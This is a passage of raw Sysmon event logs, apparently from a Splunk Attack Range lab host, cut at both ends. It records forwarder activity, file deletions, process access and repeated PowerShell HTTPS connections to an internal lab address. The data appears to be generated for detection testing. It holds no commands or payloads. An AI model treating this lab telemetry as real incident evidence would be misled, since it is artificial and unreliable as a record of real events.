Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F1803B9A1D65F86095FCC64CE827CB6,SHA256=D77092D34EF283ADFF67E9A1542D1744A97B56F8DEB88116DDBB961BCA54D111,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497211Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:16:40.858{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50505-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497214Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:12.872{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E02F8B0B4B8A2237328BC44F186AAC68,SHA256=950F6619B75E8EA25B85CB56F0C83E4A4CCD255232FEE0CC959C01F991A085B7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497213Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:41.804{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50506-false10.0.1.12-8000- 23542300x800000000000000036497215Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:13.902{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FD5D6117D6EDC176B8CE1BDE0FCEF41,SHA256=C81DBFE0D4F8B5B82CDC66862BEB726BA4AC1E1D168C6D0557F88B4A21707D53,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497216Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:14.920{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67B4D00901DE60815ADFC269D82186B1,SHA256=89F7668D1D6E3E2D169A9E7004B7570D3798D74D401B0D281E9471DBC10AFC63,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497217Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:15.968{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A937A036250DC6A101C2A8CD21E315CC,SHA256=06759D387ABE05DD81AB6345C1F67B683ACC1B617B55ECC4824F81663BF984A5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497219Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:16.985{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F25AA1F8F2EDAD3475F3B34908EC685A,SHA256=8186AF16D37CDFA99E129D6E3E52D781D8A9EA597B873CEA04921B6E4955306A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497218Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:16.420{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=89032AE408A24A98E2A4E8068BA511CD,SHA256=0D786484F3C58E8FA9BA288B9F8A6C949FA621A6BD3A9FA6FA540BD4BD3DD34C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
354300x800000000000000036497220Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:46.868{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50507-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000036497222Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:47.835{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50508-false10.0.1.12-8000- 23542300x800000000000000036497221Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:18.037{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=269C74ADD03BD2455E65EB1BB5EE2AD5,SHA256=59F293152B00628A3EBA180ADEF924CBF9AE1365E9776234E941B4763D0F551D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497223Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:19.098{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=397B54DBE35B1C7E03AE4DF13CA908BA,SHA256=9AEBA52BBDD25C8636A4D609438BC9451C2EF05C054F3B19A1032B128A3B42AF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497224Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:20.114{B81B27B7-4024-611D-7300-00000000C801}2188NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2D58BEF4D87D9E6D62FA56694B6131C,SHA256=6C611EE76800337777FCC574B96D5CD7434AF1F00357A759FC496C2F958CE3DB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497226Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:21.380{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=DFD239FE20A02054EB3530EA8A8B0A3F,SHA256=A91333650691943AAAE61803C30D59CBC3CE85FD9948365EAAFA326AD816FDA4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497225Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:21.133{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B4CA3DC0FDADCEFD8E5D9F9A39315E2,SHA256=D31ED0739063A5732B689467DB406084D8D9BF962333185781F4943D4DFF212E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497228Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:51.882{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50509-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497227Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:16:22.163{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FE6647CED24639F47D843DE54338740,SHA256=AB4DF798559E964919A934C7E323F6783F2EE064F7230BB82C4A077A3CD9CAAF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497230Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:23.231{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=B33438B21CF44385E1D7E83677098A4B,SHA256=9EC74F6A948A5BB8158C536C5B78BA14038DB3D283B69D5EE23EFF0292851091,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497229Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:23.214{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84393118558F71C6FDE5384ABD3CC113,SHA256=A52939F463DDFFFA6F71DDB9CF23B19407DF8DD6809D2BC264CAE86EACAA752B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497249Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:24.893{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A0A8-6140-7B56-04000000C801}2348C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497248Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:24.893{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497247Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:16:24.893{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497246Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:24.893{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497245Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:16:24.893{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497244Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:24.893{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-A0A8-6140-7B56-04000000C801}2348C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497243Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:24.893{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A0A8-6140-7B56-04000000C801}2348C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497242Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:24.878{B81B27B7-A0A8-6140-7B56-04000000C801}2348C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000036497241Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:24.361{B81B27B7-A0A8-6140-7A56-04000000C801}71127096C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000036497240Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:53.830{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50510-false10.0.1.12-8000- 23542300x800000000000000036497239Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:24.231{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2B8A2716E3E46377AFE3F7980FAAEF6,SHA256=21A373BAE9418EEA907113D3570A4A64F194F8DF0BECABBB533163A8C6A8DF71,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497238Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:24.193{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A0A8-6140-7A56-04000000C801}7112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497237Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:16:24.193{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497236Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:24.193{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497235Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:16:24.193{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497234Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:24.193{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497233Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:16:24.193{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-A0A8-6140-7A56-04000000C801}7112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497232Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:24.193{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A0A8-6140-7A56-04000000C801}7112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497231Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:24.178{B81B27B7-A0A8-6140-7A56-04000000C801}7112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036497252Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:25.246{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 